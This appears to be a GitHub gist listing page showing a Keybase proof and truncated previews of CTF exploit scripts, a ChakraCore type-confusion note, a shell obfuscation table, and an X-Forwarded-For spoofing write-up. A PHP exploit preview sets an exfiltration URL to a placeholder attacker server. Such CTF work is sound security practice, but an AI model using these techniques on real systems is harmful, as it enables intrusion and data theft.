I hereby claim:
- I am eboda on github.
- I am eboda (https://keybase.io/eboda) on keybase.
- I have a public key whose fingerprint is F8B6 1392 DBFC 9B65 EB8C 4955 EBE1 91C1 FFBD 546A
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#!/bin/sh | |
sed '/^-/d' $1 | sed -e 's/^+/ /g' > $1.after | |
sed '/^+/d' $1 | sed -e 's/^-/ /g' > $1.before |
#!/usr/bin/env python | |
#coding: UTF-8 | |
import struct | |
import socket | |
import telnetlib | |
import sys | |
if len(sys.argv) > 1 and sys.argv[1] == "l": | |
print "=== local exploit" |
#!/usr/bin/env python | |
import sys | |
import socket | |
import struct | |
import telnetlib | |
import time | |
import re | |
import string |
#!/usr/bin/env python | |
import sys | |
import socket | |
import struct | |
import telnetlib | |
import time | |
import re | |
import string |
import sys | |
m = { | |
'0' : '$[$?/$$]', | |
'1' : '$?', | |
'2' : '$[$?+$?]', | |
'3' : '$[$?+$?+$?]', | |
'4' : '$[$?+$?+$?+$?]', | |
'5' : '$[$?+$?+$?+$?+$?]', | |
'6' : '$[($?+$?+$?)*($?+$?)]', |
//////////////////////////////////////////////////////////////////////////// | |
// | |
// The vulnerability was that the following line of code could change the type of the | |
// underlying Array from JavascriptNativeIntArray to JavascriptArray: | |
// | |
// spreadableCheckedAndTrue = JavascriptOperators::IsConcatSpreadable(aItem) != FALSE; | |
// | |
// As can be seen in the provided .diff, the check for whether the type of the pDestArray has changed | |
// was removed. If the aItem then is not a JavascriptArray, the following code path is taken: | |
// else |
import requests | |
from PIL import Image | |
from StringIO import StringIO | |
def get_flag_rgb(): | |
rgb = [] | |
flag = requests.get("https://cryptoengine.stillhackinganyway.nl/flag").content | |
for i in range(20, 480, 40): | |
rgb.append(pixel(flag, i)) |
Web100 asked us to connect to the website from 12 different IPs from different countries. Instead of using proxies, you could simply set the X-Forwarded-For
header to an IP from the required country. A list of country to IP mappings can be found at http://www.nirsoft.net/countryip/nl.html. After doinng it 12 times, it would return the flag
<?php | |
$target = 'http://127.0.0.1/'; | |
$exploit = 'http://yourserver:1337/exploit.php'; | |
$exfil = 'http://yourserver:1337/FLAG='; | |
function enc($s) { | |
$res = ''; | |
for ($i = 0; $i < strlen($s); $i++) { | |
$res .= '\\' . dechex(ord($s[$i])); | |
} |